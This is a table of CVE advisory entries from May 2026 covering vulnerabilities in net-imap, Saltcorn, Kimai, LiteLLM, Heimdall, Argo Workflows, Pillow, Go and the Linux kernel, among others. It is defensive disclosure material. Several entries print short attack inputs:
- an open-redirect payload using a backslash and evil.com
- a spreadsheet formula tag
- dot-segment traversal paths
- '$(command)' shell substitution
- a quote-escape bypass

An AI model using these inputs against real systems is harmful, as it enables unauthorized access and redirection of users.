| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, Net::IMAP::ResponseReader has quadratic time complexity when reading large responses containing many string literals. A hostile server can send responses which are crafted to exhaust the client's CPU for a denial of service attack. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42245 | https://github.com/ruby/net-imap/security/advisories/GHSA-q2mw-fvj9-vvcw https://github.com/ruby/net-imap/commit/6091f7d6b1f3514cafbfe39c76f2b5d73de3ca96 https://github.com/ruby/net-imap/commit/88d95231fc8afef11c1f074453f7d75b68c9dfda https://github.com/ruby/net-imap/commit/de685f91a4a4cc75eb80da898c2bf8af08d34819 https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.3.10, 0.4.24, 0.5.14, and 0.6.4, a man-in-the-middle attacker can cause Net::IMAP#starttls to return "successfully", without starting TLS. This issue has been patched in versions 0.3.10, 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42246 | https://github.com/ruby/net-imap/security/advisories/GHSA-vcgp-9326-pqcp https://github.com/ruby/net-imap/commit/0ede4c40b1523dfeaf95777b2678e54cc0fd9618 https://github.com/ruby/net-imap/commit/24a4e770b43230286a05aa2a9746cdbb3eb8485e https://github.com/ruby/net-imap/commit/97e2488fb5401a1783bddd959dde007d9fbce42c https://github.com/ruby/net-imap/commit/f79d35bf5833f186e81044c57c843eda30c873da https://github.com/ruby/net-imap/releases/tag/v0.3.10 https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. From versions 0.4.0 to before 0.4.24, 0.5.0 to before 0.5.14, and 0.6.0 to before 0.6.4, when authenticating a connection with SCRAM-SHA1 or SCRAM-SHA256, a hostile server can perform a computational denial-of-service attack on the client process by sending a big iteration count value. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42256 | https://github.com/ruby/net-imap/security/advisories/GHSA-87pf-fpwv-p7m7 https://github.com/ruby/net-imap/commit/158d0b505074397cdb5ceb58935e42dd2bcfa612 https://github.com/ruby/net-imap/commit/808001bc45c06f7297a7e96d341279e041a7f7f4 https://github.com/ruby/net-imap/commit/99f59eab6064955a23debd95410263ad144df758 https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled input, it may contain CRLF sequences, which an attacker can use to inject arbitrary IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42257 | https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, symbol arguments to commands are vulnerable to a CRLF Injection / IMAP Command injection via Symbol arguments passed to IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42258 | https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| saltcorn--saltcorn | Saltcorn is an extensible, open source, no-code database application builder. Prior to versions 1.4.6, 1.5.6, and 1.6.0-beta.5, Saltcorn validates the post-login dest parameter with a string check that only blocks :/ and //. Because all WHATWG-compliant browsers normalise backslashes (\) to forward slashes (/) for special schemes, a payload such as /\evil.com/path slips through is_relative_url(), is emitted unchanged in the HTTP Location header, and causes the browser to navigate cross-origin to an attacker-controlled domain. The bug is reachable on a default install and only requires a victim who can be tricked into logging in via a crafted Saltcorn URL. This issue has been patched in versions 1.4.6, 1.5.6, and 1.6.0-beta.5. | 2026-05-07 | not yet calculated | CVE-2026-42259 | https://github.com/saltcorn/saltcorn/security/advisories/GHSA-f3g8-9xv5-77gv |
| kimai--kimai | Kimai is an open-source time tracking application. From version 2.27.0 to before version 2.54.0, any ROLE_USER can create a tag with a formula string as its name (e.g. =SUM(54+51)) via POST /api/tags and assign it to a timesheet. When an admin exports timesheets to XLSX, ArrayFormatter.formatValue() joins tag names with implode() and returns the result unchanged. OpenSpout promotes any =-prefixed string to a FormulaCell, writing <f>SUM(54+51)</f> into the XLSX archive. Excel evaluates the formula when the file is opened. This issue has been patched in version 2.54.0. | 2026-05-08 | not yet calculated | CVE-2026-42267 | https://github.com/kimai/kimai/security/advisories/GHSA-3xc2-h5r3-wv3r https://github.com/kimai/kimai/releases/tag/2.54.0 |
| BerriAI--litellm | LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to preview an MCP server before saving it - POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list - accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user - including holders of low-privilege internal-user keys - could therefore run arbitrary commands on the host. This issue has been patched in version 1.83.7. | 2026-05-08 | not yet calculated | CVE-2026-42271 | https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| dadrus--heimdall | Heimdall is a cloud native Identity Aware Proxy and Access Control Decision service. Prior to version 0.17.14, Heimdall handles URL-encoded slashes (%2F) in a case-sensitive manner, while percent-encoding is defined to be case-insensitive. As a result, the lowercase equivalent (%2f) is not recognized and therefore not processed as expected when allow_encoded_slashes is set to off (the default setting). This discrepancy can lead to differences in how request paths are interpreted by heimdall and upstream components, which may result in authorization bypass. This issue has been patched in version 0.17.14. | 2026-05-08 | not yet calculated | CVE-2026-42272 | https://github.com/dadrus/heimdall/security/advisories/GHSA-43jv-5j4x-qv67 https://github.com/dadrus/heimdall/pull/3207 https://github.com/dadrus/heimdall/commit/8b0de6aba23a047cfee3081df878271bb17f4351 https://github.com/dadrus/heimdall/releases/tag/v0.17.14 |
| dadrus--heimdall | Heimdall is a cloud native Identity Aware Proxy and Access Control Decision service. Prior to version 0.17.14, Heimdall performs host matching in a case-sensitive manner, while HTTP hostnames are case-insensitive. This discrepancy can result in heimdall failing to match a rule for a request host that differs only in letter casing, potentially causing the request to be classified differently than intended. This issue has been patched in version 0.17.14. | 2026-05-08 | not yet calculated | CVE-2026-42273 | https://github.com/dadrus/heimdall/security/advisories/GHSA-72h4-mxfc-jx37 https://github.com/dadrus/heimdall/pull/3208 https://github.com/dadrus/heimdall/commit/3d05e56a9e7ef0355f17482b4322054af4e85943 https://github.com/dadrus/heimdall/releases/tag/v0.17.14 |
| dadrus--heimdall | Heimdall is a cloud native Identity Aware Proxy and Access Control Decision service. Prior to version 0.17.14, Heimdall performs rule matching on the raw (non-normalized) request path, while downstream components may normalize dot-segments according to RFC 3986, Section 6.2.2.3. This discrepancy can result in heimdall authorizing a request for one path (e.g., /user/../admin, or URL-encoded variants such as /user/%2e%2e/admin or /user/%2e%2e%2fadmin; the latter requires the allow_encoded_slashes option to be set to on or no_decode) while the downstream ultimately processes a different, normalized path (/admin). This issue has been patched in version 0.17.14. | 2026-05-08 | not yet calculated | CVE-2026-42274 | https://github.com/dadrus/heimdall/security/advisories/GHSA-3q34-rx83-r6mq https://github.com/dadrus/heimdall/pull/3209 https://github.com/dadrus/heimdall/commit/b5dfa484b7a8c2ce6d8691c026f9da867719947a https://github.com/dadrus/heimdall/releases/tag/v0.17.14 |
| UltraDAGcom--core | UltraDAG is a minimal DAG-BFT blockchain in Rust. Prior to commit fb6ef59, the UltraDAG StateEngine implementation of SmartTransferTx contains a critical logic flaw in its policy enforcement pipeline. When a transaction originates from a "Pocket" (a derived sub-address documented in the protocol as a way to organize funds), the engine fails to resolve the pocket's parent account before checking the spending policy. Because pockets are "virtual" addresses that exist only as entries in the pocket_to_parent map and do not have their own SmartAccountConfig entries, the check_spending_policy method defaults to an "authorized/no policy" result. This allows any user (or attacker in possession of a parent key) to instantly drain every pocket on an account, even if the parent account has a strict 24-hour vault delay or a 1 UDAG daily limit. This issue has been patched via commit fb6ef59. | 2026-05-08 | not yet calculated | CVE-2026-42278 | https://github.com/UltraDAGcom/core/security/advisories/GHSA-9chc-gjfr-6hrq https://github.com/UltraDAGcom/core/commit/fb6ef59d6c1385400e7acea7ae31fc6a473c3051 |
| emlog--emlog | Emlog is an open source website building system. Prior to version 2.6.11, missing CSRF protection in critical admin functions allows attackers to trick authenticated administrators into performing unauthorized actions like system registration, plugin management, and configuration changes. This issue has been patched in version 2.6.11. | 2026-05-08 | not yet calculated | CVE-2026-42286 | https://github.com/emlog/emlog/security/advisories/GHSA-cqqp-rx28-gv2q |
| emlog--emlog | Emlog is an open source website building system. Prior to version 2.6.11, direct SQL injection in article creation and update functions allows attackers to execute arbitrary SQL commands, potentially leading to complete database compromise, data theft, or system destruction. This issue has been patched in version 2.6.11. | 2026-05-08 | not yet calculated | CVE-2026-42287 | https://github.com/emlog/emlog/security/advisories/GHSA-xxj8-fc63-j3gw |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.7.14 and 4.0.5, the Webhook Interceptor loads the entire request body into memory before authenticating the request or verifying its signature. This occurs on the /api/v1/events/ endpoint, which is publicly accessible (albeit intended for webhooks). An attacker can send a request with an extremely large body (e.g., multiple gigabytes), causing the Argo Server to allocate excessive memory, potentially leading to an Out-Of-Memory (OOM) crash and denial of service. This issue has been patched in versions 3.7.14 and 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42294 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-jcc8-g2q4-9fxq https://github.com/argoproj/argo-workflows/commit/7abb4de6c3599e2d5d960ba4d5de4cf1df109965 https://github.com/argoproj/argo-workflows/releases/tag/v3.7.14 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, the workflow executor logs all artifact repository credentials (S3 access keys, secret keys, GCS service account keys, Azure account keys, Git passwords, etc.) in plaintext on artifact operation. Any user with read access to workflow pod logs can extract these credentials. This issue has been patched in version 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42295 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-7vf8-2cr6-54mf https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, the Sync Service's ConfigMap-backed provider (server/sync/sync_cm.go) performs zero authorization checks on all CRUD operations (create, read, update, delete). Any authenticated user - including those using fake Bearer tokens - can create, read, update, and delete Kubernetes ConfigMaps containing synchronization limits. This issue has been patched in version 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42297 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xchc-cqwg-g76q https://github.com/argoproj/argo-workflows/commit/09fff05e0830c14a5e36cc40597ad84881db1ab6 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| python-pillow--Pillow | Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances by an exceedingly large amount for each glyph, the running position that Pillow keeps while laying out text may overflow an integer. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42308 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| python-pillow--Pillow | Pillow is a Python imaging library. From version 11.2.1 to before version 12.2.0, passing nested lists as coordinates to APIs that accept coordinates such as ImagePath.Path, ImageDraw.ImageDraw.polygon and ImageDraw.ImageDraw.line could cause a heap buffer overflow, as nested lists were recursively unpacked beyond the allocated buffer. Coordinate lists are now validated to contain exactly two numeric coordinates. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42309 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-5xmw-vc9v-4wf2 https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| python-pillow--Pillow | Pillow is a Python imaging library. From version 4.2.0 to before version 12.2.0, an attacker can supply a malicious PDF that causes the process to hang indefinitely, consuming 100% CPU and making the application unresponsive. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42310 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-r73j-pqj5-w3x7 https://github.com/python-pillow/Pillow/pull/9519 https://github.com/python-pillow/Pillow/commit/3bf614e4b8615d0ce1d5039efaf6db447fe7c468 https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| python-pillow--Pillow | Pillow is a Python imaging library. From version 10.3.0 to before version 12.2.0, processing a malicious PSD file could lead to memory corruption, potentially resulting in a crash or arbitrary code execution. This issue has been patched in version 12.2.0. | 2026-05-09 | not yet calculated | CVE-2026-42311 | https://github.com/python-pillow/Pillow/security/advisories/GHSA-pwv6-vv43-88gr https://github.com/python-pillow/Pillow/pull/9520 https://github.com/python-pillow/Pillow/commit/58f9a1d166dcb0c274807d4423522d205b0c35ea https://github.com/python-pillow/Pillow/releases/tag/12.2.0 |
| quarkiverse--quarkus-openapi-generator | Quarkus OpenAPI Generator is a Quarkus extension for generating REST clients and server stubs. Prior to versions 2.11.1-lts, 2.16.0-lts, and 2.17.0, the generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints. This issue has been patched in versions 2.11.1-lts, 2.16.0-lts, and 2.17.0. | 2026-05-09 | not yet calculated | CVE-2026-42333 | https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586 https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0 |
| QuantumNous--new-api | New API is a large language model (LLM) gateway and artificial intelligence (AI) asset management system. In versions 0.11.9-alpha.1 and prior, the SSRF protection introduced in v0.9.0.5 (CVE-2025-59146) and hardened in v0.9.6 (CVE-2025-62155) does not block the unspecified address 0.0.0.0. A regular (non-admin) user holding any valid API token can send a multimodal request to /v1/chat/completions, /v1/responses, or /v1/messages with 0.0.0.0 as the image/file URL host, bypassing the private-IP filter and causing the server to issue HTTP requests to localhost. This constitutes at minimum a blind SSRF; when the request is routed through an AWS/Bedrock Claude adaptor, the fetched content is inlined into the model response, upgrading it to a full-read SSRF. At time of publication, there are no publicly available patches. | 2026-05-08 | not yet calculated | CVE-2026-42339 | https://github.com/QuantumNous/new-api/security/advisories/GHSA-v5c3-6wvc-pc2q |
| labring--FastGPT | FastGPT is an AI Agent building platform. In versions 4.14.13 and prior, the code-sandbox component suffers from insufficient resource isolation and uncontrolled resource consumption. The service relies solely on an application-level soft limit (a 500ms polling interval) for memory management and lacks strict OS-level constraints such as cgroups or kernel-level namespaces. This architectural weakness allows attackers to easily bypass memory checks via time-window attacks, or exhaust the entire JavaScript worker pool via concurrent CPU-intensive requests, resulting in a complete Denial of Service (DoS) for legitimate users. At time of publication, there are no publicly available patches. | 2026-05-08 | not yet calculated | CVE-2026-42343 | https://github.com/labring/FastGPT/security/advisories/GHSA-qv7v-r94x-6x3x |
| akuity--kargo | Kargo manages and automates the promotion of software artifacts. Prior to versions 1.7.10, 1.8.13, 1.9.8, and 1.10.2, Kargo is vulnerable to open redirect in UI OIDC login flow via the redirectTo query parameter. This issue has been patched in versions 1.7.10, 1.8.13, 1.9.8, and 1.10.2. | 2026-05-08 | not yet calculated | CVE-2026-42350 | https://github.com/akuity/kargo/security/advisories/GHSA-g7gw-m874-7rmf |
| Apache Software Foundation--Apache OpenNLP | OOM Denial of Service via Unbounded Array Allocation in Apache OpenNLP AbstractModelReader. Versions affected: before 2.5.9; before 3.0.0-M3. Description: The AbstractModelReader methods getOutcomes(), getOutcomePatterns(), and getPredicates() each read a 32-bit signed integer count field from a binary model stream and pass that value directly to an array allocation (new String[numOutcomes], new int[numOCTypes][], new String[NUM_PREDS]) without validating that the value is non-negative or within a reasonable bound. The count is therefore fully attacker-controlled when the model file originates from an untrusted source. A crafted .bin model file in which any of these count fields is set to Integer.MAX_VALUE (or any value large enough to exhaust the available heap) triggers an OutOfMemoryError at the array allocation itself, before the corresponding label or pattern data is consumed from the stream. The error occurs very early in deserialization: for a GIS model, getOutcomes() is reached after only the model-type string, the correction constant, and the correction parameter have been read; so the attacker pays no meaningful size cost to weaponize a payload, and a single small file can crash a JVM that loads it. Any code path that deserializes a .bin model is affected, including direct use of GenericModelReader and any higher-level component that delegates to it during model load. The practical impact is denial of service against processes that load model files from untrusted or semi-trusted origins. Mitigation: * 2.x users should upgrade to 2.5.9. * 3.x users should upgrade to 3.0.0-M3. Note: The fix introduces an upper bound on each of the three count fields, checked before array allocation; counts that are negative or exceed the bound cause an IllegalArgumentException to be thrown and the read to fail fast with no large allocation. The default bound is 10,000,000, which is well above the entry counts of legitimate OpenNLP models but far below any value that would threaten heap exhaustion. Deployments that legitimately need to load models with more entries than the default can raise the limit at JVM startup by setting the OPENNLP_MAX_ENTRIES system property to the desired positive integer (e.g. -DOPENNLP_MAX_ENTRIES=50000000); invalid or non-positive values fall back to the default. Users who cannot upgrade immediately should treat all .bin model files as untrusted input unless their provenance is verified, and should avoid loading models supplied by end users or fetched from third-party repositories without integrity checks. | 2026-05-04 | not yet calculated | CVE-2026-42440 | https://lists.apache.org/thread/s8xlkx1gqbxfsq48py5h6jphjvgqp1jo |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, the extractArchive and compressFiles endpoints in file-manager.ts use double-quoted strings for shell command construction, unlike all other file manager operations which use single-quote escaping. Double quotes allow $(command) substitution, enabling command injection on the remote SSH host. This issue has been patched in version 2.1.0. | 2026-05-08 | not yet calculated | CVE-2026-42453 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-rvg4-7vvq-9c2w https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag |
| linkwarden--linkwarden | Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In versions 2.14.0 and prior, the archive upload endpoint (POST /api/v1/archives/[linkId]?format=4) accepts HTML files (text/html) without sanitizing JavaScript content. When the archive is later accessed via GET /api/v1/archives/[linkId]?format=4, the HTML is served with Content-Type: text/html from the Linkwarden origin, without any Content-Security-Policy header. This allows arbitrary JavaScript execution in the context of the authenticated Linkwarden session. At time of publication, there are no publicly available patches. | 2026-05-08 | not yet calculated | CVE-2026-42455 | https://github.com/linkwarden/linkwarden/security/advisories/GHSA-fjvg-mch3-j3vg |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to version 1.18.0, four GET endpoints under /api/templates* in Arcane's Huma backend are registered without any Security requirement, allowing any unauthenticated network client to list and read the full Compose YAML and .env content of every custom template stored in the instance. Because Arcane's UI exposes a "Save as Template" flow on the project / swarm-stack creation pages that persists the operator's real env content (database passwords, API keys, etc.) verbatim, this missing authorization is an unauthenticated read of operator secrets in practice - not a theoretical info-disclosure. The frontend explicitly treats /customize/templates/* as an authenticated area (PROTECTED_PREFIXES in frontend/src/lib/utils/redirect.util.ts), and every CRUD operation (POST/PUT/DELETE) on the same paths requires a Bearer/API key, so this is a clear backend authorization gap, not intended public access. This issue has been patched in version 1.18.0. | 2026-05-09 | not yet calculated | CVE-2026-42461 | https://github.com/getarcaneapp/arcane/security/advisories/GHSA-cxx3-hr75-4q96 https://github.com/getarcaneapp/arcane/releases/tag/v1.18.0 |
| Go standard library--net/mail | Pathological inputs could cause DoS through consumePhrase when parsing an email address according to RFC 5322. | 2026-05-07 | not yet calculated | CVE-2026-42499 | https://go.dev/issue/78987 https://go.dev/cl/771520 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4977 |
| Go toolchain--cmd/go | A malicious module proxy can exploit a flaw in the go command's validation of module checksums to bypass checksum database validation. This vulnerability affects any user using an untrusted module proxy (GOPROXY) or checksum database (GOSUMDB). A malicious module proxy can serve altered versions of the Go toolchain. When selecting a different version of the Go toolchain than the currently installed toolchain (due to the GOTOOLCHAIN environment variable, or a go.work or go.mod with a toolchain line), the go command will download and execute a toolchain provided by the module proxy. A malicious module proxy can bypass checksum database validation for this downloaded toolchain. Since this vulnerability affects the security of toolchain downloads, setting GOTOOLCHAIN to a fixed version is not sufficient. You must upgrade your base Go toolchain. The go tool always validates the hash of a toolchain before executing it, so fixed versions will refuse to execute any cached, altered versions of the toolchain. The go tool trusts go.sum files to contain accurate hashes of the current module's dependencies. A malicious proxy exploiting this vulnerability to serve an altered module will have caused an incorrect hash to be recorded in the go.sum. Users who have configured a non-trusted GOPROXY can determine if they have been affected by running "rm go.sum ; go mod tidy ; go mod verify", which will revalidate all dependencies of the current module. The specific flaw in more detail: The go command consults the checksum database to validate downloaded modules, when a module is not listed in the go.sum file. It verifies that the module hash reported by the checksum database matches the hash of the downloaded module. If, however, the checksum database returns a successful response that contains no entry for the module, the go command incorrectly permitted validation to succeed. A module proxy may mirror or proxy the checksum database, in which case the go command will not connect to the checksum database directly. Checksums reported by the checksum database are cryptographically signed, so a malicious proxy cannot alter the reported checksum for a module. However, a proxy which returns an empty checksum response, or a checksum response for an unrelated module, could cause the go command to proceed as if a downloaded module has been validated. | 2026-05-07 | not yet calculated | CVE-2026-42501 | https://go.dev/cl/775321 https://go.dev/issue/79070 https://groups.google.com/g/golang-announce/c/qcCIEXso47M https://pkg.go.dev/vuln/GO-2026-4984 |
| golang.org/x/tools--golang.org/x/tools/gopls | gopls by default communicates via pipe. However, -port and -listen flags are supported as means of debugging. If -listen is given a value without an explicit host (e.g. :8080), or -port is used, gopls will listen on 0.0.0.0. As a result, users might inadvertently cause gopls to bind 0.0.0.0. This can allow a malicious party on the same network to execute code arbitrarily via gopls. | 2026-05-06 | not yet calculated | CVE-2026-42503 | https://go.dev/issue/79211 https://go.dev/cl/774381 |
| Apache Software Foundation--Apache Wicket | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, 9.0.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-42509 | https://lists.apache.org/thread/52nrq4tt07gxz4r6sj5gyocz5s6bprjp |
| PelicanPlatform--pelican | Pelican is a platform for creating data federations. From versions 7.21.0 to before 7.21.5, 7.22.0 to before 7.22.3, 7.23.0 to before 7.23.3, and 7.24.0 to before 7.24.2, there is a privilege escalation vulnerability affecting Pelican's Web User Interface (WebUI). This attack allows any user authenticated to the WebUI via OAuth to gain admin privileges under certain configurations. This issue has been patched in versions 7.21.5, 7.22.3, 7.23.3, and 7.24.2. | 2026-05-09 | not yet calculated | CVE-2026-42571 | https://github.com/PelicanPlatform/pelican/security/advisories/GHSA-rpfr-x88x-xwcw https://github.com/PelicanPlatform/pelican/commit/7f73b9c3e677a0ae4a0ec465c5d98bb8bd948854 |
| ArchiveBox--ArchiveBox | ArchiveBox is an open source self-hosted web archiving system. In versions 0.8.6rc0 and prior, the /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE. At time of publication, there are no publicly available patches. | 2026-05-09 | not yet calculated | CVE-2026-42601 | https://github.com/ArchiveBox/ArchiveBox/security/advisories/GHSA-3h23-7824-pj8r |
| absinthe-graphql--absinthe | Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL. Multiple Blueprint.Draft.convert/2 implementations in Absinthe's SDL language modules call String.to_atom/1 on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with system_limit and taking down the entire node. Any application that passes attacker-controlled GraphQL SDL through Absinthe's parser is exposed - for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents. This issue affects absinthe: from 1.5.0 before 1.10.2. | 2026-05-08 | not yet calculated | CVE-2026-42793 | https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7 https://cna.erlef.org/cves/CVE-2026-42793.html https://osv.dev/vulnerability/EEF-CVE-2026-42793 https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838 |
| absinthe-graphql--absinthe_plug | Improper Neutralization of Input During Web Page Generation (XSS) vulnerability in absinthe-graphql absinthe_plug allows reflected cross-site scripting via the GraphiQL interface. 'Elixir.Absinthe.Plug.GraphiQL':js_escape/1 in lib/absinthe/plug/graphiql.ex escapes single quotes and newlines in the query GET parameter before embedding it in an inline JavaScript string, but does not escape backslashes. An attacker can bypass the escaping by prefixing a quote with a backslash (e.g. \'), breaking out of the string context and executing arbitrary JavaScript in the victim's browser. This issue affects absinthe_plug: from 1.2.0. | 2026-05-08 | not yet calculated | CVE-2026-42794 | https://github.com/absinthe-graphql/absinthe_plug/issues/275 https://cna.erlef.org/cves/CVE-2026-42794.html https://osv.dev/vulnerability/EEF-CVE-2026-42794 https://github.com/absinthe-graphql/absinthe_plug/commit/23a0d5658d32420086711adf4ce8f05febb09963 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: Fix list corruption and UAF in command complete handlers Commit 302a1f674c00 ("Bluetooth: MGMT: Fix possible UAFs") introduced mgmt_pending_valid(), which not only validates the pending command but also unlinks it from the pending list if it is valid. This change in semantics requires updates to several completion handlers to avoid list corruption and memory safety issues. This patch addresses two left-over issues from the aforementioned rework: 1. In mgmt_add_adv_patterns_monitor_complete(), mgmt_pending_remove() is replaced with mgmt_pending_free() in the success path. Since mgmt_pending_valid() already unlinks the command at the beginning of the function, calling mgmt_pending_remove() leads to a double list_del() and subsequent list corruption/kernel panic. 2. In set_mesh_complete(), the use of mgmt_pending_foreach() in the error path is removed. Since the current command is already unlinked by mgmt_pending_valid(), this foreach loop would incorrectly target other pending mesh commands, potentially freeing them while they are still being processed concurrently (leading to UAFs). The redundant mgmt_cmd_status() is also simplified to use cmd->opcode directly. | 2026-05-05 | not yet calculated | CVE-2026-43059 | https://git.kernel.org/stable/c/695b45b2262fcb5e71bed1175aad59c72f92aa78 https://git.kernel.org/stable/c/b5c5e96f3b0a5003c3ff98ebb33e59afec51dd77 https://git.kernel.org/stable/c/02023ff760cc104a5d86a82ef5b8dd89098ad78d https://git.kernel.org/stable/c/17f89341cb4281d1da0e2fb0de5406ab7c4e25ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: 8250: Fix TX deadlock when using DMA `dmaengine_terminate_async` does not guarantee that the `__dma_tx_complete` callback will run. The callback is currently the only place where `dma->tx_running` gets cleared. If the transaction is canceled and the callback never runs, then `dma->tx_running` will never get cleared and we will never schedule new TX DMA transactions again. This change makes it so we clear `dma->tx_running` after we terminate the DMA transaction. This is "safe" because `serial8250_tx_dma_flush` is holding the UART port lock. The first thing the callback does is also grab the UART port lock, so access to `dma->tx_running` is serialized. | 2026-05-05 | not yet calculated | CVE-2026-43061 | https://git.kernel.org/stable/c/8190f9ab6ad90cb97652adbebd238b874a4ef70d https://git.kernel.org/stable/c/79a19bd936bb35f56ef0ccab1b3b59ebce8c762d https://git.kernel.org/stable/c/f76d91271bcacbd759a2e4ee3ea61faa6a727ccf https://git.kernel.org/stable/c/d2719a0a9c3439abf67843a5504b7afccd9ded93 https://git.kernel.org/stable/c/2a72403b985aea6b4aac3171830492f9a387f9e1 https://git.kernel.org/stable/c/5f6b17562f03fc65c7d3474ef8f1959b19d1ca41 https://git.kernel.org/stable/c/b5ad887339503103d0fbe9827b16ad287597c275 https://git.kernel.org/stable/c/a424a34b8faddf97b5af41689087e7a230f79ba7 |
